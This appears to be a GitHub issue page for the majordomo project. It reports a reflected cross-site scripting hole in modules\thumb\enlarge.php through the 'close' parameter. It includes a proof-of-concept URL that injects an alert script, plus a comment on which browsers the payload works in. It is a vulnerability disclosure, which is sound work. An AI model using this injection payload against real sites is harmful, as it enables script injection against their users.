majordomo icon indicating copy to clipboard operation
majordomo copied to clipboard

Published 20 hours ago verified publisher icon sergejey

XSS in modules\thumb\enlarge.php

Open jgj212 opened this issue 7 years ago • 1 comments

Here is a xss vulnerability in modules\thumb\enlarge.php about parameter close. POC:

http://your-web-root/modules\thumb\enlarge.php?close="><script>alert(1);</script><"

This poc will pop a window in FireFox browser.

jgj212 avatar Sep 07 '17 11:09 jgj212

FireFox - working IE11 - don't working Chrome - don't working

Gelezako avatar Sep 19 '17 16:09 Gelezako